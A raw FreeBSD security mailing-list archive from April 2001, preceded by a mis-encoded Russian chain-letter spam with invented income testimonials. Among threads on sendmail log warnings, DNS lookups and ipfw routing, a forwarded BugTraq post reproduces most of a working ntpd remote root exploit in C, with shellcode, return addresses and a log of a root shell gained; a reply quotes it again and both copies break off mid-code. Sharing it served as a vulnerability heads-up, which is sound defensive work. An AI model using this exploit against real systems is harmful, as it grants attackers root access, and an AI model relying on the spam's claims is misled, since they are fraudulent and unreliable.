    Ìåíÿ çîâóò Mitchell a ìîÿ æåíà Jody, æèâåì â ×èêàãî. ß áóõãàëòåð â îäíîé àìåðèêàíñêîé ôèðìå è çàðàáàòûâàþ íà æèçíü äîñòàòî÷íî äåíåã. Êîãäà ÿ ïîëó÷èë ýòîò e-mail, ÿ áûë çîë íà æåíó èç-çà ïîëó÷åíèÿ "junk mail" (ðåêëàìíûå ëèñòû, è ò.ä.., áåç ïîæåëàíèÿ). ß ïîñìåÿëñÿ íàä ïðåäëîæåíèåì, ÿ çíàë, ÷òî ýòî íå áóäåò äåéñòâîâàòü. Jody ìåíÿ àáñîëþòíî èãíîðèðîâàëà è íà÷àëà ýòèì çàíèìàòüñÿ. ß øóòèë íàä íåé è áûë ãîòîâ ïðîèçíåñòè èçâåñòíóþ ôðàçó "Âèäèøü, ÿ æå òåáå ãîâîðèë, ÷òî ýòî íå áóäåò äåéñòâîâàòü!" Íî ñìåÿëèñü ïîòîì íàäî ìíîé!!! Çà 45 äíåé îíà ïîëó÷èëà 47.200,- USD. ß áûë â øîêå!!! ß áûë óâåðåí, ÷òî ýòî íå äåéñòâóåò, a ýòî áûëà íåïðàâäà!!! ß ïðèñîåäèíèëñÿ ê Jody, äî ïåíñèè ìíå îñòàâàëîñü ñåìü ëåò, a ýòà ïðîãðàììà âåðíóëà ìíå æåëàíèå ðàáîòàòü, ïîòîìó ÷òî ÿ âèäåë ñâîè ðåçóëüòàòû!

    Mitchell Wolf, MD, Chicago, IL.

    ************************************************************

    Ãëàâíûì äîâîäîì ýòîãî ïèñüìà ÿâëÿåòñÿ òî, ÷òîáû óáåäèë âàñ, ÷òî ýòî ÷åñòíàÿ, ëåãàëüíàÿ, ïðèáûëüíàÿ ñèñòåìà äëÿ çàðàáàòûâàíèÿ áîëüøèõ äåíåã çà êîðîòêîå âðåìÿ. ß òîëüêî ïîïðîáîâàë, ÷òîáû óçíàòü, ÷òî ìîæíî ïîëó÷èòü âçàìåí çà ìèíèìàëüíûé âêëàä è ñòàðàíèå. Ê ìîåìó óäèâëåíèþ ÿ ïîëó÷èë 3.470,- USD çà ïåðâûõ 14 äíåé à îñòàëüíûå äåíüãè âñå åùå ïðèõîäÿò!!!

    Charles Morris, Esq.

    ************************************************************

    Òàê êàê ÿ íå ÿâëÿþñü òèïîì àçàðòíîãî èãðîêà, ïðîøëî íåñêîëüêî íåäåëü, ïåðåä òåì êàê ÿ ðåøèë ïîïðîáîâàòü. ß ïðèøåë ê âûâîäó, ÷òî 20,- USD ýòî òàêîé ìàëåíüêèé âêëàä, ÷òî ïðîñòî èñêëþ÷åíî, ÷òîáû ÿ íå íàøåë õîòÿ áû íåñêîëüêî çàêàçîâ, äëÿ âîçâðàòà ñâîåé èíâåñòèöèè. Áîæå, êàê ÿ áûë óäèâëåí, êîãäà óâèäåë ñâîé êîøåëåê, ïîëíûé çàêàçîâ! Çà íåêîòîðîå âðåìÿ èõ ïîñòóïèëî ñòîëüêî, ÷òî ÿ áûë âûíóæäåí âçÿòü îòïóñê íà ðàáîòå. Çà ýòîò ãîä ÿ çàðàáîòàë áîëüøå äåíåã, ÷åì çà ïîñëåäíèå äåñÿòü ëåò! Ñàìîå ïðåêðàñíîå â òîì, ÷òî íåâàæíî ãäå ëþäè æèâóò. Ýòî ïðîñòî - ñàìàÿ ëó÷øàÿ èíâåñòèöèÿ ñ î÷åíü áûñòðûì îáîðîòîì.

    Paige Willis, Des Moines, IA.

    ************************************************************

    Îäèí ðàç ÿ óæå ïîëó÷èë ýòó ïðîãðàììó. ß åå óäàëèë, íî ïîòîì ÿ ïîäóìàë î òîì, ÷òî ñòîèëî áû ïîïðîáîâàòü. Êîíå÷íî, ÿ íå èìåë ïðåäñòàâëåíèÿ êîãäà ïîëó÷ó îïÿòü ïîäîáíîå ïðåäëîæåíèå, ïîýòîìó ÿ áûë âûíóæäåí æäàòü, ïîêà ìíå êòî-íèáóäü íå ïðèøëåò çàíîâî. Ïðîøëî 11 ìåñÿöåâ êîãäà ÿ ñíîâà ïîëó÷èë åãî. Òåïåðü ÿ åãî íå ñîòðól!!! Ñ ïåðâîãî ðàçà ÿ ïîëó÷èë 41.000,- USD!!!!

    Violet Wilson, Johnstown, PA.

    ************************************************************

    Ó÷àñòâóþ â ýòîé ïðîãðàììå óæ â òðåòèé ðàç. Ìû óøëè ñ ðàáîòû, à ÷åðåç íåêîòîðîå âðåìÿ êóïèëè ñåáå äîì íà ïëÿæå è áóäåì æèòü íå äóìàÿ î äåíüãàõ. Åñòü òîëüêî îäèí ñïîñîá íà Çåìëå, ÷òîáû çàñòàâèòü èñïîëíÿòüñÿ ñâîè ïëàíû - ÝÒÎ ÍÀ×ÀÒÜ ÂÛÏÎËÍßÒÜ ÈÕ. Ðàäè Áîãà, íå ïðîïóñòèòå ýòó ÇÎËÎÒÓÞ âîçìîæîñòü!!! Ìíîãî ñ÷àñòüÿ è ïðèÿòíîé òðàòû äåíåã!

    Kerry Ford, Centerport, NY.

    ************************************************************

    ÇÀÊÀÆÈÒÅ ÑÅÁÅ REPORT`s ÏÐßÌÎ ÑÅÉ×ÀÑ È ÂÑÒÀÂÀÉÒÅ ÍÀ ÏÓÒÜ Ê ÍÅÇÀÂÈÑÈÌÎÑÒÈ, ÑÂÎÁÎÄÅ È Ñ×ÀÑÒÜÞ!

    ÒÅÏÅÐÜ ÂÐÅÌß ÍÀ ÄÎÑÒÈÆÅÍÈÅ ÎÃÐÎÌÍÛÕ ÐÅÇÓËÜÒÀÒÎÂ!!

    ÏÎÆÀËÓÉÑÒÀ ÂÍÈÌÀÍÈÅ: Åñëè âàì íóæåí ñîâåò êàê íà÷àòü ïðåäïðèíèìàòü, çàðåãèñòðèðîâàòü òîðãîâîå íàçâàíèå, íàó÷èòüñÿ ïëàòèòü íàëîãè, êîíòàêòèðóéòå ñ îòäåëîì ïðåäïðèíèìàòåëüñòâà. Âàøè ðåçóëüòàòû çàâèñÿò òîëüêî îò Âàñ, îò Âàøåé ðàáîòû. Ýòî ïèñüìî íå ãàðàíòèðóåò íèêàêèõ äîõîäîâ è íèêàêèõ ðåçóëüòàòîâ, íî âñå ñóììû è ðåçóëüòàòû, óêàçàííûå â ýòîì äîêóìåíòå -- ÔÀÊÒ.

    !!!ÂÑÅ ÇÀÂÈÑÈÒ ÒÎËÜÊÎ ÎÒ ÂÀÑ!!!

    ÁÎËÜØÎÃÎ ÓÑÏÅÕÀ!!!

    P.S. Âû ñìîæåòå ñâÿçàòüñÿ ñî ìíîé ïî àäðåñó: WM_13@yahoo.com

    P.S. èëè çàéòè íà ìîþ ñòðàíè÷êó : http://www.geocities.com/wm_13/

    C óâàæåíèåì, Ìèõàèë.

    1
    1


    Do You Yahoo!?
    Yahoo! Mail Personal Address - Get email at your own domain with Yahoo! Mail. --0-2086206725-986370454=:7069-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 8:27:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from gilberto.physik.rwth-aachen.de (gilberto.physik.rwth-aachen.de [137.226.30.2]) by hub.freebsd.org (Postfix) with ESMTP id 2E5CC37B71E for ; Wed, 4 Apr 2001 08:27:13 -0700 (PDT) (envelope-from kuku@gilberto.physik.rwth-aachen.de) Received: (from kuku@localhost) by gilberto.physik.rwth-aachen.de (8.11.1/8.9.3) id f34FRB571384 for freebsd-security@freebsd.org; Wed, 4 Apr 2001 17:27:11 +0200 (CEST) (envelope-from kuku) Date: Wed, 4 Apr 2001 17:27:11 +0200 (CEST) From: Christoph Kukulies Message-Id: <200104041527.f34FRB571384@gilberto.physik.rwth-aachen.de> To: freebsd-security@freebsd.org Subject: sendmail (possible attack) in logs Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm seeing this for a couple of days now in my /var/log/messages: Apr 3 18:28:12 gil sendmail[63971]: f33GSBt63970: Truncated MIME Content-Type h eader due to field size (possible attack) Do I need to be concerned? -- Chris Christoph P. U. Kukulies kuku@gil.physik.rwth-aachen.de To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 9:10:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from tholian.securitydynamics.com (mail.rsasecurity.com [204.167.112.129]) by hub.freebsd.org (Postfix) with SMTP id D2BDB37B71E for ; Wed, 4 Apr 2001 09:10:08 -0700 (PDT) (envelope-from dfinkelstein@rsasecurity.com) Received: from sdtihq24.securid.com by tholian.securitydynamics.com via smtpd (for hub.freebsd.org [216.136.204.18]) with SMTP; 4 Apr 2001 16:07:43 UT Received: from tuna.rsa.com (tuna.rsa.com [10.80.211.153]) by sdtihq24.securid.com (Pro-8.9.3/Pro-8.9.3) with ESMTP id MAA08875 for ; Wed, 4 Apr 2001 12:10:07 -0400 (EDT) Received: from rsasecurity.com ([10.81.217.239]) by tuna.rsa.com (8.8.8+Sun/8.8.8) with ESMTP id JAA24088 for ; Wed, 4 Apr 2001 09:10:16 -0700 (PDT) From: dfinkelstein@rsasecurity.com Message-Id: <200104041610.JAA24088@tuna.rsa.com> X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4 X-Exmh-Isig-CompType: unknown X-Exmh-Isig-Folder: lists/freebsd-mobile To: freebsd-security@freebsd.org Subject: Name lookup strageness Mime-Version: 1.0 Content-Type: text/plain Date: Wed, 04 Apr 2001 09:10:05 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Greetings, I've seen something strange on my box and I was hoping somebody could provide some insight. I'm running a 4.1.1 install with the patch for ipfw "established" rules (advisory FreeBSD-SA-01:08). The box runs ipfw and natd. I run no servers (no sendmail, bind, etc.) except for sshd and lpd; I have firewall rules that prohibit connections to these services unless the connection came from my internal network. I do name lookups to my ISP's name servers (my firewall rules only allow UPD traffic to/from port 53 on these servers). On three occasions now (about a week or two apart), I've found that my box will no longer resolve names. Network connectivity is otherwise unaffected, and all my configuration seems to be unchanged (boxes on my internal network are still able to do name lookups to my ISP's name servers). When this happens, I have only benn able to fix the problem by rebooting. Now, the interesting (to me) thing is, when this happens and I try to resolve a name, I see the following sorts of entries in my firewall log: Apr 3 20:40:07 balagan /kernel: ipfw: 65435 Deny UDP my.freebsd.ip.addr:53 some.nearby.ip.addr:1529 out via tun0 Apr 3 20:40:12 balagan /kernel: ipfw: 65435 Deny UDP my.freebsd.ip.addr:53 some.nearby.ip.addr:1529 out via tun0 Apr 3 20:40:22 balagan /kernel: ipfw: 65435 Deny UDP my.freebsd.ip.addr:53 some.nearby.ip.addr:1530 out via tun0 Apr 3 20:51:58 balagan /kernel: ipfw: 65435 Deny UDP my.freebsd.ip.addr:53 some.nearby.ip.addr:1531 out via tun0 So when I type "nslookup somehost" my box attempts to connect to some other machine at numerically increasing port numbers. The three times this has happened, the scan has started at different numbers. The target machine is not one of my name servers; once it was on my local subnet, and twice it was on a "nearby" subnet (same ISP as me but the last two octets of the address differed). Does anybody have any ideas about what is going on, or other things I should look for when this happens to try to trace the problem? Thanks, --- David To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 13:53:32 2001 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id D355437B71F for ; Wed, 4 Apr 2001 13:53:27 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id OAA08189; Wed, 4 Apr 2001 14:53:14 -0600 (MDT) Message-Id: <4.3.2.7.2.20010404145126.04484250@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 04 Apr 2001 14:53:09 -0600 To: Christoph Kukulies , freebsd-security@FreeBSD.ORG From: Brett Glass Subject: Re: sendmail (possible attack) in logs In-Reply-To: <200104041527.f34FRB571384@gilberto.physik.rwth-aachen.de> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org If you have clients running Microsoft Outhou... er, Outlook, you should be concerned. It's susceptible to exploits delivered via extra-long MIME headers. --Brett At 09:27 AM 4/4/2001, Christoph Kukulies wrote: >I'm seeing this for a couple of days now in my /var/log/messages: > >Apr 3 18:28:12 gil sendmail[63971]: f33GSBt63970: Truncated MIME Content-Type h >eader due to field size (possible attack) > >Do I need to be concerned? > >-- >Chris Christoph P. U. Kukulies kuku@gil.physik.rwth-aachen.de > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 14:20:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from cody.jharris.com (cody.jharris.com [205.238.128.83]) by hub.freebsd.org (Postfix) with ESMTP id 2A66337B71F for ; Wed, 4 Apr 2001 14:20:29 -0700 (PDT) (envelope-from nick@rogness.net) Received: from localhost (nick@localhost) by cody.jharris.com (8.11.1/8.9.3) with ESMTP id f34MNq508054; Wed, 4 Apr 2001 17:23:52 -0500 (CDT) (envelope-from nick@rogness.net) Date: Wed, 4 Apr 2001 17:23:51 -0500 (CDT) From: Nick Rogness X-Sender: nick@cody.jharris.com To: "Crist J. Clark" Cc: Matthew Reimer , owensmk@earthlink.net, security@FreeBSD.ORG Subject: Re: Multiple Default Gateways using DIVERT In-Reply-To: <3ACAE8CE.F9223E28@alum.mit.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 4 Apr 2001, Crist J. Clark wrote: > Matthew Reimer wrote: > > > > This might be a start, though I'm not sure how NAT should fit in. You'll > > need the IPFIREWALL and IPFIREWALL_FORWARD kernel options. > > > > ipfw add 1000 fwd 2.2.2.1 ip from 10.10.10.0/25 to any > > ipfw add 2000 fwd 2.2.2.2 ip from 10.10.10.128/25 to any > > Neither of the two responses I saw looked like they would do what the > original > poster wanted. It is a start, but this one will not work as shown with > natd. The search will terminate with the above rules, before being > divert(4)ed. add 200 fwd 2.2.2.2 ip from 10.10.10.128/25 to any out recv ed0 xmit de0 add 300 divert natd ip from any to any de0 IIRC, the above rule 200 will match the inbound packet from ed0, change the next hop address, then be re-run through the firewall on the way out the interface de0 (rule 300 above) to the destination. I've tested this with a log rule at 250 and it seems to match the outbound packet, so I'm assuming this will work. Since he specified in a later email that 2.2.2.2 and 2.2.2.1 are on the same outbound interface, you could get away with running 1 natd, as both subnet's traffic would return via the same interface...regarless of where it came from. However, the catch is on outbound traffic. The second DSL provider must allow the alias address of 1st DSL's provider through their gateways (not likely). Therefore, what Crist suggested would work pretty damn well. There are several variations of that ruleset provided that could work. Nick Rogness - Keep on Routing in a Free World... "FreeBSD: The Power to Serve!" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 14:39:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from nsmail.corp.globalstar.com (gibraltar.globalstar.com [207.88.248.142]) by hub.freebsd.org (Postfix) with ESMTP id 0727037B71C for ; Wed, 4 Apr 2001 14:39:08 -0700 (PDT) (envelope-from cjclark@alum.mit.edu) Received: from alum.mit.edu ([207.88.153.184]) by nsmail.corp.globalstar.com (Netscape Messaging Server 4.15) with ESMTP id GBAESO00.P8M; Wed, 4 Apr 2001 14:38:48 -0700 Message-ID: <3ACB947D.16A66B4C@alum.mit.edu> Date: Wed, 04 Apr 2001 14:39:09 -0700 From: Crist Clark Organization: Globalstar LP X-Mailer: Mozilla 4.75 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: Nick Rogness Cc: "Crist J. Clark" , Matthew Reimer , owensmk@earthlink.net, security@FreeBSD.ORG Subject: Re: Multiple Default Gateways using DIVERT References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Nick Rogness wrote: > > On Wed, 4 Apr 2001, Crist J. Clark wrote: > > > Matthew Reimer wrote: > > > > > > This might be a start, though I'm not sure how NAT should fit in. You'll > > > need the IPFIREWALL and IPFIREWALL_FORWARD kernel options. > > > > > > ipfw add 1000 fwd 2.2.2.1 ip from 10.10.10.0/25 to any > > > ipfw add 2000 fwd 2.2.2.2 ip from 10.10.10.128/25 to any > > > > Neither of the two responses I saw looked like they would do what the > > original > > poster wanted. It is a start, but this one will not work as shown with > > natd. The search will terminate with the above rules, before being > > divert(4)ed. > > add 200 fwd 2.2.2.2 ip from 10.10.10.128/25 to any out recv ed0 xmit de0 > add 300 divert natd ip from any to any de0 > > IIRC, the above rule 200 will match the inbound packet from ed0, > change the next hop address, then be re-run through the firewall > on the way out the interface de0 (rule 300 above) to the > destination. > > I've tested this with a log rule at 250 and it seems to match the > outbound packet, so I'm assuming this will work. I don't think it will. That rule 200 should not work as you say. From ipfw(8), fwd ipaddr[,port] ... If the IP is not a local ad- dress then the port number (if specified) is ignored and the rule only applies to packets leaving the system. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ I am unsure how it would break tho'. That is, whether the packets fall in the bitbucket when processed on ed0 or if they get shortcircuited to the wire before getting to 300 when the packet crosses de0. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 15:30:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from cody.jharris.com (cody.jharris.com [205.238.128.83]) by hub.freebsd.org (Postfix) with ESMTP id C15C537B72F for ; Wed, 4 Apr 2001 15:30:44 -0700 (PDT) (envelope-from nick@rogness.net) Received: from localhost (nick@localhost) by cody.jharris.com (8.11.1/8.9.3) with ESMTP id f34NXnY08334; Wed, 4 Apr 2001 18:33:50 -0500 (CDT) (envelope-from nick@rogness.net) Date: Wed, 4 Apr 2001 18:33:49 -0500 (CDT) From: Nick Rogness X-Sender: nick@cody.jharris.com To: Crist Clark Cc: "Crist J. Clark" , Matthew Reimer , owensmk@earthlink.net, security@FreeBSD.ORG Subject: Re: Multiple Default Gateways using DIVERT In-Reply-To: <3ACB947D.16A66B4C@alum.mit.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 4 Apr 2001, Crist Clark wrote: > > add 200 fwd 2.2.2.2 ip from 10.10.10.128/25 to any out recv ed0 xmit de0 > > add 300 divert natd ip from any to any de0 > > > > IIRC, the above rule 200 will match the inbound packet from ed0, > > change the next hop address, then be re-run through the firewall > > on the way out the interface de0 (rule 300 above) to the > > destination. > > > > I've tested this with a log rule at 250 and it seems to match the > > outbound packet, so I'm assuming this will work. > > I don't think it will. That rule 200 should not work as you say. From > ipfw(8), That's odd. WHen I add to the above ruleset: add 250 log ip from any to any out via de0 I see the packet going outbound... > > fwd ipaddr[,port] > ... If the IP is not a local ad- > dress then the port number (if specified) is > ignored and > the rule only applies to packets leaving the system. > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > I am unsure how it would break tho'. That is, whether the packets fall > in the bitbucket when processed on ed0 or if they get shortcircuited to > the wire before getting to 300 when the packet crosses de0. I'm not sure on this one, I'll send some actual logs in a while when I get home. Nick Rogness - Keep on Routing in a Free World... "FreeBSD: The Power to Serve!" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 16:47:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail2.insweb.com (mail2.insweb.com [204.254.158.36]) by hub.freebsd.org (Postfix) with ESMTP id 5C9C937B43E for ; Wed, 4 Apr 2001 16:46:58 -0700 (PDT) (envelope-from fbsd-secure@ursine.com) Received: from ursine.com (dhcp-4-45-203.users.insweb.com [10.4.45.203]) by mail2.insweb.com (8.11.0/8.11.0) with ESMTP id f34NkhT42184 for ; Wed, 4 Apr 2001 16:46:52 -0700 (PDT) (envelope-from fbsd-secure@ursine.com) Message-ID: <3ACBB263.2804E9C2@ursine.com> Date: Wed, 04 Apr 2001 16:46:43 -0700 From: Michael Bryan X-Mailer: Mozilla 4.76 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Fwd: ntpd =< 4.0.99k remote buffer overflow Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Heads up. This just came across BugTraq, will likely affect FreeBSD. As of 4.2-RELEASE, the ntpd that ships with FreeBSD is 4.0.99b. -------- Original Message -------- From: Przemyslaw Frasunek Subject: ntpd =< 4.0.99k remote buffer overflow To: BUGTRAQ@SECURITYFOCUS.COM /* ntpd remote root exploit / babcia padlina ltd. */ /* * Network Time Protocol Daemon (ntpd) shipped with many systems is vulnerable * to remote buffer overflow attack. It occurs when building response for * a query with large readvar argument. In almost all cases, ntpd is running * with superuser privileges, allowing to gain REMOTE ROOT ACCESS to timeserver. * * Althought it's a normal buffer overflow, exploiting it is much harder. * Destination buffer is accidentally damaged, when attack is performed, so * shellcode can't be larger than approx. 70 bytes. This proof of concept code * uses small execve() shellcode to run /tmp/sh binary. Full remote attack * is possible. * * NTP is stateless UDP based protocol, so all malicious queries can be * spoofed. * * Example of use on generic RedHat 7.0 box: * * [venglin@cipsko venglin]$ cat dupa.c * main() { setreuid(0,0); system("chmod 4755 /bin/sh"); } * [venglin@cipsko venglin]$ cc -o /tmp/sh dupa.c * [venglin@cipsko venglin]$ cc -o ntpdx ntpdx.c * [venglin@cipsko venglin]$ ./ntpdx -t2 localhost * ntpdx v1.0 by venglin@freebsd.lublin.pl * * Selected platform: RedHat Linux 7.0 with ntpd 4.0.99k-RPM (/tmp/sh) * * RET: 0xbffff777 / Align: 240 / Sh-align: 160 / sending query * [1] <- evil query (pkt = 512 | shell = 45) * [2] <- null query (pkt = 12) * Done. * /tmp/sh was spawned. * [venglin@cipsko venglin]$ ls -al /bin/bash * -rwsr-xr-x 1 root root 512540 Aug 22 2000 /bin/bash * */ #include #include #include #include #include #include #include #include #include #include #define NOP 0x90 #define ADDRS 8 #define PKTSIZ 512 static char usage[] = "usage: ntpdx [-o offset] <-t type> "; /* generic execve() shellcodes */ char lin_execve[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/tmp/sh"; char bsd_execve[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/sh\x01\x01\x01\x01" "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; struct platforms { char *os; char *version; char *code; long ret; int align; int shalign; int port; }; /* Platforms. Notice, that on FreeBSD shellcode must be placed in packet * *after* RET address. This values will vary from platform to platform. */ struct platforms targ[] = { { "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve, 0xbfbff8bc, 200, 220, 0 }, { "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve, 0xbfbff540, 200, 220, 0 }, { "RedHat Linux 7.0", "4.0.99k-RPM (/tmp/sh)", lin_execve, 0xbffff777, 240, 160, 0 }, { NULL, NULL, NULL, 0x0, 0, 0, 0 } }; long getip(name) char *name; { struct hostent *hp; long ip; extern int h_errno; if ((ip = inet_addr(name)) < 0) { if (!(hp = gethostbyname(name))) { fprintf(stderr, "gethostbyname(): %s\n", strerror(h_errno)); exit(1); } memcpy(&ip, (hp->h_addr), 4); } return ip; } int doquery(host, ret, shellcode, align, shalign) char *host, *shellcode; long ret; int align, shalign; { /* tcpdump-based reverse engineering :)) */ char q2[] = { 0x16, 0x02, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x36, 0x73, 0x74, 0x72, 0x61, 0x74, 0x75, 0x6d, 0x3d }; char q3[] = { 0x16, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; char buf[PKTSIZ], *p; long *ap; int i; int sockfd; struct sockaddr_in sa; bzero(&sa, sizeof(sa)); sa.sin_family = AF_INET; sa.sin_port = htons(123); sa.sin_addr.s_addr = getip(host); if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) { perror("socket"); return -1; } if((connect(sockfd, (struct sockaddr *)&sa, sizeof(sa))) < 0) { perror("connect"); close(sockfd); return -1; } memset(buf, NOP, PKTSIZ); memcpy(buf, q2, sizeof(q2)); p = buf + align; ap = (unsigned long *)p; for(i=0;i; Wed, 4 Apr 2001 16:56:03 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter (localhost [127.0.0.1]) by critter.freebsd.dk (8.11.3/8.11.3) with ESMTP id f34Ntvt52567; Thu, 5 Apr 2001 01:55:57 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Michael Bryan Cc: freebsd-security@FreeBSD.ORG Subject: Re: Fwd: ntpd =< 4.0.99k remote buffer overflow In-Reply-To: Your message of "Wed, 04 Apr 2001 16:46:43 PDT." <3ACBB263.2804E9C2@ursine.com> Date: Thu, 05 Apr 2001 01:55:57 +0200 Message-ID: <52565.986428557@critter> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This has already been fixed in FreeBSD current & stable an hour ago or so. Poul-Henning In message <3ACBB263.2804E9C2@ursine.com>, Michael Bryan writes: > >Heads up. This just came across BugTraq, will likely affect FreeBSD. >As of 4.2-RELEASE, the ntpd that ships with FreeBSD is 4.0.99b. > > >-------- Original Message -------- >From: Przemyslaw Frasunek >Subject: ntpd =< 4.0.99k remote buffer overflow >To: BUGTRAQ@SECURITYFOCUS.COM > >/* ntpd remote root exploit / babcia padlina ltd. */ > >/* > * Network Time Protocol Daemon (ntpd) shipped with many systems is vulnerable > * to remote buffer overflow attack. It occurs when building response for > * a query with large readvar argument. In almost all cases, ntpd is running > * with superuser privileges, allowing to gain REMOTE ROOT ACCESS to timeserver. > * > * Althought it's a normal buffer overflow, exploiting it is much harder. > * Destination buffer is accidentally damaged, when attack is performed, so > * shellcode can't be larger than approx. 70 bytes. This proof of concept code > * uses small execve() shellcode to run /tmp/sh binary. Full remote attack > * is possible. > * > * NTP is stateless UDP based protocol, so all malicious queries can be > * spoofed. > * > * Example of use on generic RedHat 7.0 box: > * > * [venglin@cipsko venglin]$ cat dupa.c > * main() { setreuid(0,0); system("chmod 4755 /bin/sh"); } > * [venglin@cipsko venglin]$ cc -o /tmp/sh dupa.c > * [venglin@cipsko venglin]$ cc -o ntpdx ntpdx.c > * [venglin@cipsko venglin]$ ./ntpdx -t2 localhost > * ntpdx v1.0 by venglin@freebsd.lublin.pl > * > * Selected platform: RedHat Linux 7.0 with ntpd 4.0.99k-RPM (/tmp/sh) > * > * RET: 0xbffff777 / Align: 240 / Sh-align: 160 / sending query > * [1] <- evil query (pkt = 512 | shell = 45) > * [2] <- null query (pkt = 12) > * Done. > * /tmp/sh was spawned. > * [venglin@cipsko venglin]$ ls -al /bin/bash > * -rwsr-xr-x 1 root root 512540 Aug 22 2000 /bin/bash > * > */ > >#include >#include >#include >#include >#include >#include >#include >#include >#include >#include > >#define NOP 0x90 >#define ADDRS 8 >#define PKTSIZ 512 > >static char usage[] = "usage: ntpdx [-o offset] <-t type> "; > >/* generic execve() shellcodes */ > >char lin_execve[] = > "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" > "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" > "\x80\xe8\xdc\xff\xff\xff/tmp/sh"; > >char bsd_execve[] = > "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" > "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" > "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/sh\x01\x01\x01\x01" > "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; > >struct platforms >{ > char *os; > char *version; > char *code; > long ret; > int align; > int shalign; > int port; >}; > >/* Platforms. Notice, that on FreeBSD shellcode must be placed in packet > * *after* RET address. This values will vary from platform to platform. > */ > >struct platforms targ[] = >{ > { "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve, > 0xbfbff8bc, 200, 220, 0 }, > > { "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve, > 0xbfbff540, 200, 220, 0 }, > > { "RedHat Linux 7.0", "4.0.99k-RPM (/tmp/sh)", lin_execve, > 0xbffff777, 240, 160, 0 